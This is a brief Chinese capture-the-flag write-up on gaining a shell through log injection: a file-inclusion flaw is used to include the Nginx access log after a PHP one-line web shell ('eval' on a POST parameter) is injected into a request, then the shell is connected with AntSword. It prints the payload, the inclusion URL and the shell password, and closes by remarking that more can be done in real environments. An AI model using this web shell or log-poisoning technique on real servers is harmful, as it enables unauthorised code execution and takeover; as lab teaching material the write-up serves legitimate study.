日志文件可能被注入导致任意代码执行甚至getshell等。
文章目录
日志注入getshell
中间件的日志文件通常用于保存网站的访问记录,其中包括了客户端发送的HTTP请求行、User-Agent、Referer等信息。这些日志文件对于网站的运维和安全分析非常有用。
如果能够在HTTP请求中插入恶意代码,那么这些恶意代码就会被保存到日志文件中。当访问日志文件时,其中的恶意代码可能会被执行。
实战
环境如下:
页面提示存在文件包含漏洞
服务器为Nginx,尝试访问日志文件:
访问成功,所以此时可以抓包添加一句话木马、连接蚁剑
<?php @eval($_POST[ice]);?>
http://297a37a5-d6a8-4f2c-8f53-960416721f6b.challenge.ctf.show/?url=/var/log/nginx/access.log
密码ice
在真实的环境中可进行更进一步的操作。